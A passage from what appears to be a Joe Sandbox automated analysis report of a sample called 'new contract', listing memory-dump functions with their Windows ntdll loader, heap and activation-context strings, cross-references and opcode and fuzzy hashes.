                                                                                                                                                                            • Opcode Fuzzy Hash: 59eac647a97c6b4e53b377dfeef0ddf3e1ea80861bcce05535e163657380da44
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A314876F00215B7EB22CA998CA1F6B7B7DEB65A41F05406DFF0567240D370AE01C7A1
                                                                                                                                                                            Function 0165C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01698181, 016981F5
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0165C6C3
                                                                                                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 016981E5
                                                                                                                                                                            • LdrpInitializeProcess, xrefs: 0165C6C4
                                                                                                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01698170
                                                                                                                                                                            • LdrpInitializeImportRedirection, xrefs: 01698177, 016981EB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                            • API String ID: 0-475462383
                                                                                                                                                                            • Opcode ID: c58d93f369b8ba3177b3a167f9d0e2192000a633f9b8b0ff446314f8c693e7c4
                                                                                                                                                                            • Instruction ID: 86a7cd99d0e35456778b4412876b222dd92d98a3d03b9a3a3e2442e0d9cd26ad
                                                                                                                                                                            • Opcode Fuzzy Hash: c58d93f369b8ba3177b3a167f9d0e2192000a633f9b8b0ff446314f8c693e7c4
                                                                                                                                                                            • Instruction Fuzzy Hash: E13122B1644306AFD325EF28DC46E2A779AFF95B20F04055CFD45AB391E660EC04C7A6
                                                                                                                                                                            Function 0166096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 01662DF0: LdrInitializeThunk.NTDLL ref: 01662DFA
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660BA3
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660BB6
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660D60
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660D74
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1404860816-0
                                                                                                                                                                            • Opcode ID: 54ab76e53b756ff0c69347b5fd065d88283ce04f789416c4a663d725021a018b
                                                                                                                                                                            • Instruction ID: c78c349a46ba9bf35a2b814d350ceb4eaf3a89747f25f847d5e7a9a69c508312
                                                                                                                                                                            • Opcode Fuzzy Hash: 54ab76e53b756ff0c69347b5fd065d88283ce04f789416c4a663d725021a018b
                                                                                                                                                                            • Instruction Fuzzy Hash: B54239759007159FDB21CF68CC80BAAB7F9BF44314F1445AEE989AB241E770AA85CF60
                                                                                                                                                                            Function 0162A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                            • API String ID: 0-379654539
                                                                                                                                                                            • Opcode ID: d6ac719d08df932bdebf4407be4bb1339b50a361af7dd5e244537080d4afe990
                                                                                                                                                                            • Instruction ID: aed819404688b28ebe655d5509301966b87b0f45c0d30406147a4eaba5da056d
                                                                                                                                                                            • Opcode Fuzzy Hash: d6ac719d08df932bdebf4407be4bb1339b50a361af7dd5e244537080d4afe990
                                                                                                                                                                            • Instruction Fuzzy Hash: 2DC1AA701087928FD721DF98C940B6AB7E5BF84304F04896EF9859BB50E3B4C94ACF56
                                                                                                                                                                            Function 01658402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0165855E
                                                                                                                                                                            • @, xrefs: 01658591
                                                                                                                                                                            • LdrpInitializeProcess, xrefs: 01658422
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01658421
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-1918872054
                                                                                                                                                                            • Opcode ID: 58a84b655b1941d5020dfb45a1f7e6595ea3914ed03924f843ccdf691801fff3
                                                                                                                                                                            • Instruction ID: bf41b6cf54e710b9422abd702caced4621730166137709d462cb4f86abc11382
                                                                                                                                                                            • Opcode Fuzzy Hash: 58a84b655b1941d5020dfb45a1f7e6595ea3914ed03924f843ccdf691801fff3
                                                                                                                                                                            • Instruction Fuzzy Hash: EA918B71508345AFDB62DE26CC80FABBAEDFB84658F40092EFA8597151E730D904CB66
                                                                                                                                                                            Function 0165273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016922B6
                                                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 016921DE
                                                                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016921D9, 016922B1
                                                                                                                                                                            • .Local, xrefs: 016528D8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                            • API String ID: 0-1239276146
                                                                                                                                                                            • Opcode ID: 62fbe577a47a232008a4b40a400e99d60e07e2eebbe461fe5b26a615b513df84
                                                                                                                                                                            • Instruction ID: 5610cc46abf0adac761209916e87baae62c08676d06807df2b3dd488d4dfc894
                                                                                                                                                                            • Opcode Fuzzy Hash: 62fbe577a47a232008a4b40a400e99d60e07e2eebbe461fe5b26a615b513df84
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA1AB3190022ADBDB25CF69CCA4BA9B7B5BF58314F2541EED908AB351D7309E81CF94
                                                                                                                                                                            Function 01654AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • RtlDeactivateActivationContext, xrefs: 01693425, 01693432, 01693451
                                                                                                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0169342A
                                                                                                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01693437
                                                                                                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01693456
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                            • API String ID: 0-1245972979
                                                                                                                                                                            • Opcode ID: e86505092a15415f339113dbc1dbec13886568171b959fcc1cadec25279be02b
                                                                                                                                                                            • Instruction ID: 8f27eb32b89c90019a09e2e3507a3fe30ddc4edda30106afc0811d7b089b81bc
                                                                                                                                                                            • Opcode Fuzzy Hash: e86505092a15415f339113dbc1dbec13886568171b959fcc1cadec25279be02b
                                                                                                                                                                            • Instruction Fuzzy Hash: FA6103366457129BDB228F2CCC45B2AB7E9AF80B50F15855DEC959B380EB30EC41CB95
                                                                                                                                                                            Function 016264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016810AE
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0168106B
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01680FE5
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01681028
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                            • API String ID: 0-1468400865
                                                                                                                                                                            • Opcode ID: b55b768a4b7ec658d20f6fa5320b1ee5503e9af56e38f90c03838528ffb51759
                                                                                                                                                                            • Instruction ID: fedcaebce959fc9dfa20b889862cad424169a113520badcce46f3cd6198fce6e
                                                                                                                                                                            • Opcode Fuzzy Hash: b55b768a4b7ec658d20f6fa5320b1ee5503e9af56e38f90c03838528ffb51759
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C71DAB1904315AFCB21EF18CC84B9B7BA9AB95764F00446CFD498B24AD734D589CFD2
                                                                                                                                                                            Function 0164245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpDynamicShimModule, xrefs: 0168A998
                                                                                                                                                                            • apphelp.dll, xrefs: 01642462
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0168A9A2
                                                                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0168A992
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-176724104
                                                                                                                                                                            • Opcode ID: 40766f0747439a1d03b1a75d812afa49a3d9dbf286935927c574667ea479df9a
                                                                                                                                                                            • Instruction ID: ebab9575c0d7abab44d41c2f6418a22a26c7f51417e13d3ba16c16b9003b374d
                                                                                                                                                                            • Opcode Fuzzy Hash: 40766f0747439a1d03b1a75d812afa49a3d9dbf286935927c574667ea479df9a
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D316B75650202EBDB31AF9DDC85E6ABBB5FB84B20F26415EFD0167349C7B05982CB80
                                                                                                                                                                            Function 016329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • HEAP: , xrefs: 01633264
                                                                                                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0163327D
                                                                                                                                                                            • HEAP[%wZ]: , xrefs: 01633255
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                            • API String ID: 0-617086771
                                                                                                                                                                            • Opcode ID: beb4f93cf4221fa00bb50b3e0cdf0ca7bb5b8a2b05167586006e82c9d2185acc
                                                                                                                                                                            • Instruction ID: 315edae81eab34eb9b95ec6791035038c414e411fc47745c0b14478b83b8dff8
                                                                                                                                                                            • Opcode Fuzzy Hash: beb4f93cf4221fa00bb50b3e0cdf0ca7bb5b8a2b05167586006e82c9d2185acc
                                                                                                                                                                            • Instruction Fuzzy Hash: D392BC71A042499FEB25CF68C8547AEBBF1FF89314F18805DE846AB391D734A946CF50
                                                                                                                                                                            Function 01630770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-4253913091
                                                                                                                                                                            • Opcode ID: 540cf724d8eb5c73ed3811accd8ab1925d96d840c86a6d82eabbd7020dee3cbc
                                                                                                                                                                            • Instruction ID: e89b2cdae23f084df9e468ea54943c08b3c5819514cbeb15f401c40d6b443caa
                                                                                                                                                                            • Opcode Fuzzy Hash: 540cf724d8eb5c73ed3811accd8ab1925d96d840c86a6d82eabbd7020dee3cbc
                                                                                                                                                                            • Instruction Fuzzy Hash: BBF1AF30600606DFEB25DF68CC94B6AB7F6FF84704F1482A9E5569B381D734E986CB90
                                                                                                                                                                            Function 01646962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID: $@
                                                                                                                                                                            • API String ID: 2994545307-1077428164
                                                                                                                                                                            • Opcode ID: 18d1ec9b677ef3d664547193d7980801f3c3d9b567a42612661e1d749525c64f
                                                                                                                                                                            • Instruction ID: 3df312599905ed2550ceab1a0d3e11de5adcc1d076c7ba6b153b84f7ed052a7a
                                                                                                                                                                            • Opcode Fuzzy Hash: 18d1ec9b677ef3d664547193d7980801f3c3d9b567a42612661e1d749525c64f
                                                                                                                                                                            • Instruction Fuzzy Hash: A9C26D716083519FEB25CF28CC81BABBBE5AF89754F04892DF98987341D734D845CBA2
                                                                                                                                                                            Function 0161A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                            • API String ID: 0-2779062949
                                                                                                                                                                            • Opcode ID: 66e3b462108e9cc2c115084768d791ba1aaf799aa98a00a9242dc8aa73e0f4da
                                                                                                                                                                            • Instruction ID: c8969d603df6a2c8806528b39df793f5656d61a34d2974e505bd757a7d70d722
                                                                                                                                                                            • Opcode Fuzzy Hash: 66e3b462108e9cc2c115084768d791ba1aaf799aa98a00a9242dc8aa73e0f4da
                                                                                                                                                                            • Instruction Fuzzy Hash: 4AA19E7191162A9BDB31DF68CC88BEAB7B9FF44710F0441EAEA08A7210D7359E84CF54
                                                                                                                                                                            Function 01640BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpCheckModule, xrefs: 0168A117
                                                                                                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 0168A10F
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0168A121
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-161242083
                                                                                                                                                                            • Opcode ID: 85e42eb243bc58872ee6c8a24d88422aca71315fc50ba16f57a1f43f11134aa6
                                                                                                                                                                            • Instruction ID: 0a07079f10b82248c352056c2390c65a1010808ac2962a297c5c9ece3aec0d8e
                                                                                                                                                                            • Opcode Fuzzy Hash: 85e42eb243bc58872ee6c8a24d88422aca71315fc50ba16f57a1f43f11134aa6
                                                                                                                                                                            • Instruction Fuzzy Hash: 6271D070A00216DFDB25EFACCD80AAEB7F5FB44214F14816DE942A7351E774A942CB54
                                                                                                                                                                            Function 01630A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-1334570610
                                                                                                                                                                            • Opcode ID: 178633fc1dabdd7e47d9d70bd53a90e00589c17cff79077cce49f916141e7d35
                                                                                                                                                                            • Instruction ID: 25f070452fa4f04a920b37fa30de2fa877c07550aaf0b773fd85771b36ab4225
                                                                                                                                                                            • Opcode Fuzzy Hash: 178633fc1dabdd7e47d9d70bd53a90e00589c17cff79077cce49f916141e7d35
                                                                                                                                                                            • Instruction Fuzzy Hash: 3E61AE706003059FDB29DF28C840B6ABBE2FF85704F14865DE8568B396D771E886CB95
                                                                                                                                                                            Function 0165C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 016982D7
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 016982E8
                                                                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 016982DE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-1783798831
                                                                                                                                                                            • Opcode ID: fd360fc302135ccd7204513fe1164ffa9e157b1338d116d5be0dd564da292ac7
                                                                                                                                                                            • Instruction ID: ba8eea6dcc79c3a657b37db413014c7a64b4514860774b04c4564647633516ad
                                                                                                                                                                            • Opcode Fuzzy Hash: fd360fc302135ccd7204513fe1164ffa9e157b1338d116d5be0dd564da292ac7
                                                                                                                                                                            • Instruction Fuzzy Hash: 2041E071504301ABCB21EB68DC44B6B7BEDEF89B60F00892EFA4897294E770D801CB95
                                                                                                                                                                            Function 016DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • PreferredUILanguages, xrefs: 016DC212
                                                                                                                                                                            • @, xrefs: 016DC1F1
                                                                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 016DC1C5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                            • API String ID: 0-2968386058
                                                                                                                                                                            • Opcode ID: 4363f72733ec7c46ab9fb2fda3fd907b64770aaf683e07330fd4e7b8ef366b24
                                                                                                                                                                            • Instruction ID: 6d3ffe50855e7982f0a421f3709fb1f14548a012362b1373f827e851994ca6e0
                                                                                                                                                                            • Opcode Fuzzy Hash: 4363f72733ec7c46ab9fb2fda3fd907b64770aaf683e07330fd4e7b8ef366b24
                                                                                                                                                                            • Instruction Fuzzy Hash: EA417172E0021DEBDB11DAD9CC91BEEBBBDAB14700F14816EE609A7244D7749A44CB94
                                                                                                                                                                            Function 016B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                            • API String ID: 0-1373925480
                                                                                                                                                                            • Opcode ID: 3ccf32fdd9159c572cf60fe00be02e6c10d53027490e85e39116fc10fc42f477
                                                                                                                                                                            • Instruction ID: 8dfb85b9ab79ae7535f0fa62dd13560962699763f9128ade4dd5dcb8c4829dbd
                                                                                                                                                                            • Opcode Fuzzy Hash: 3ccf32fdd9159c572cf60fe00be02e6c10d53027490e85e39116fc10fc42f477
                                                                                                                                                                            • Instruction Fuzzy Hash: EF412632A006588BEB26DBD9CD84BEDBBB9FF55340F14046DD902EB382DB359981CB51
                                                                                                                                                                            Function 016A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 016A4888
                                                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 016A4899
                                                                                                                                                                            • LdrpCheckRedirection, xrefs: 016A488F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                            • API String ID: 0-3154609507
                                                                                                                                                                            • Opcode ID: f78fd2a08833c62fc106fbfc2bc7147049202d60c167c7a0e1b8c2a8b48de1ae
                                                                                                                                                                            • Instruction ID: 3e567b938d98e34fa9a4fdf1b980047cc4c8aa15cb968f166791b9e98da8c6b5
                                                                                                                                                                            • Opcode Fuzzy Hash: f78fd2a08833c62fc106fbfc2bc7147049202d60c167c7a0e1b8c2a8b48de1ae
                                                                                                                                                                            • Instruction Fuzzy Hash: AD41C332A046919FCB21CE5CEC40A267BE9FF49A50B4A056DED4997351DBB0EC01CF91
                                                                                                                                                                            Function 01630BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-2558761708
                                                                                                                                                                            • Opcode ID: 90e71fa0d1c91a174136b69c75a7bd9c01da67c8a0efb7f5439b720cc48a420b
                                                                                                                                                                            • Instruction ID: 7f915320a8c34357439fbab741a0bf1ae657cb7a125ff64346cdf7c8711227ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 90e71fa0d1c91a174136b69c75a7bd9c01da67c8a0efb7f5439b720cc48a420b
                                                                                                                                                                            • Instruction Fuzzy Hash: A311CD353561029FDB29EA1CCC41B66B3A6AF81716F18826DF4078B255DB30D846C755
                                                                                                                                                                            Function 016A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpInitializationFailure, xrefs: 016A20FA
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 016A2104
                                                                                                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 016A20F3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-2986994758
                                                                                                                                                                            • Opcode ID: d9e6ba07839b377f176e9890be0007851d0909889a9bc5cf72809e431c17770f
